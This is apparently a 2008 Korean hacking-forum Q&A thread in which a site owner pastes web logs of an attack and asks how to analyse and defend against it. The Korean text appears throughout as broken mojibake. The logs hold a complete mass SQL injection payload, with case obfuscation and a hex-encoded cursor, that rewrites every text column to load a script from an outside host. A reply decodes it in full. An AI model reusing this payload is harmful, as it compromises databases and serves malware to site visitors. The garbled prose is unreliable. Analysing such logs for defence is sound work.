Å©·¡Å· ÇÇÇØ

 423, 7/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   youngman0707
   sqlÀÎÁ§¼Ç¹®Á¦Àä...ÄÚµåºÐ¼®Á¡ ºÎŹµå¸³´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=382 [º¹»ç]


%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20AnD%20''=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20And%20'%25'=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--%20aNd%20'%25'=

  Hit : 3755     Date : 2008/11/10 03:27



    
youngman0707 Á¦°¡ Áö½ÄÀ̾è¾Æ¼­ ..ÀÌ·±°Å¹ß»ýÇßÀ»¶§..¾î¶»°Ô ºÐ¼®..±×¸®°í º¸¾ÈÇؾߵǴÂÁö ..°í¼ö´ÔµéÀÇ Àâ´ÙÇÑ
ÇѸ»¾¹ºÎŹµå¸³´Ï´Ù..

Àâ´ÙÇÑ ÇѸ»¾¹ÀÌ Àú¿¡°Õ Å«ÈûÀ̵˴ϴÙ..
¿À´Ãµµ Áñ°Å¿î ÇϷ纸³»¼¼¿ä..
2008/11/10  
ÃʵùÇØÄ¿ ÈÉ..
ÄO¾Æ
Âü Çè³­Çϱ¸³ª..

ÄO phpÁ» ÇÒÁپ˾Æ?
<?
echo(urldecode("$str"));
?>

À§ ÀÌ»óÇÑ ¹®ÀÚ¿­À» ¿ä±â $str ÀÎÀÚ·Î Àü´ÞÇϸé Á» ¸¶À½ÀÌ ¾ÈÁ¤µÉ²¿¾ß
2008/11/10  
pr0sp3r Çì´õºÎºÐÀº ³¯¸®°í ½ÇÁ¦ °ø°Ý Äõ¸®´Â 0xºÎÅÍ Çí»ç°ªº¯Á¶ÈÄ urndecode Çϸé¾Æ·¡¿Í °°ÀÌ µË´Ï´Ù.<br />
<br />
%' ;dEcLaRe @S VaRcHaR(4000) SeT @s=DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE [' @T '] SET [' @C ']=RTRIM(CONVERT(VARCHAR(4000),[' @C '])) ''<script src=http://s.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Curso aS VaRcHaR(4000));eXeC(@s);-- aNd '%'=
2008/11/11  
k1rha ¿äÁò ÀÌÄÚµå Á¤¸» ÀÚÁÖº¸°Ô µÇ³×¿ä ¤»¤» mass sql injection °ø°ÝÀä, ½ÇÁ¦·Î ¹æ¾î¹ýÀº ¿øõÀûÀ¸·Î sql injection ¹æ¾î¹ý°ú °°½À´Ï´Ù¸¸, mass sql ÀÇ È­µÎ°¡ µÈÀÌÀ¯´Â IDS IPS ¸¦ ¿ìȸ ÇÒ¼ö ÀÖ´Ù´Â Á¡ÀÔ´Ï´Ù. ÀÌÁ¡À» ºñ·ÔÇØ ¹æ¾î¹ýÀ» ¼³¸íµå¸®ÀÚ¸é ÇÊÅ͸µ ±¸¹®¿¡ mass sql ¸¸ÀÇ ±¸¹®À» ÇÊÅ͸µ ÇØÁÖ¸é µÈ´Ù°í ÇÏ´õ±º¿ä ... 2008/11/14  
303   ¿©±â ¿Ã¸± Áú¹®Àº ¾Æ´Ñ°Å°°Áö¸¸     daydreamss
03/01 3443
302   ¼îÇθô »ç±â¿¡ ´ëóÇÒ¼ö ÀÖ³ª¿ä?[2]     puppyo
02/26 3560
301   FEDORAcore7¼³Ä¡¹æ¹ý[2]     tjwnsgh1207
02/18 3680
300   Å©·¡Å·ÀÎÁö´Â À߸𸣰ڴµ¥..[3]     csh0972
02/18 4028
299   ÇÁ·Î±×·¥¹®ÀÇ.[5]     wtta20
01/04 3562
298   °ÔÀÓÇØÅ·°ü·Ã¹®ÀÇ.[4]     wtta20
01/02 4117
297   Ãʺ¸Àä. Àúµµ Á¦´ë·Î ¹è¿öº¸°í½Í½À´Ï´Ù.[4]     dbflgn
12/19 4106
296   µðµµ½º °ø°Ý½Ã ¾ÆÀÌÇÇ Â÷´Ü °ü·Ã Áú¹®µå¸³´Ï´Ù.[8]     jungjae5
12/19 4669
295   Á¦°¡ ºÒ¹ýº¹Á¦ÇÇÇظ¦ ´çÇß¾î¿ä[6]     junh2507
12/18 3621
294   ÇÁ·Î±×·¡¹Ö ÄÄÆÄÀÏ ¹®Á¦Àε¥[2]     gkgjswls842
12/07 3327
293     [re] ÇÁ·Î±×·¡¹Ö ÄÄÆÄÀÏ ¹®Á¦Àε¥     ÃÖ¼±È£
12/07 3213
292   Ŭ¶óÀ̾ðÆ®¿Í ¼­¹ö°¡ ¿¬°áÇÏ´Â°Ç ‰ç´Âµ¥....[3]     dkdkfjgh
12/07 3593
291   ¿ìºÐÅõ¿¡¼­     dkdkfjgh
12/07 3692
290   active-x     dkdkfjgh
12/07 3280
289   µðµµ½ºÇØÅ·À¸·Î ¼­¹ö°¡ ´Ù¿îµÈ´Ù¸é ¾î¶»°Ô ȸº¹½ÃÄÑ¾ß Çϳª¿ä??[4]     jungjae5
12/07 4040
288     [re] µðµµ½ºÇØÅ·À¸·Î ¼­¹ö°¡ ´Ù¿îµÈ´Ù¸é ¾î¶»°Ô ȸº¹½ÃÄÑ¾ß Çϳª¿ä??[1]     k1rha
12/07 3866
287   Å©·¡Å· ÇÇÇØ¿¡ °üÇØ ¹®ÀÇ µå¸³´Ï´Ù.[7]     jungjae5
11/16 3939
  sqlÀÎÁ§¼Ç¹®Á¦Àä...ÄÚµåºÐ¼®Á¡ ºÎŹµå¸³´Ï´Ù..[4]     youngman0707
11/10 3754
285   ¾Æ·¡¿¡ À̾î IPÃßÀû¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù.[2]     asd3253
11/02 4110
284   ¾ÆÀÌÇÇÃßÀû¿¡ ´ëÇÏ¿©[7]     undine04
10/28 4418
[1][2][3][4][5][6] 7 [8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org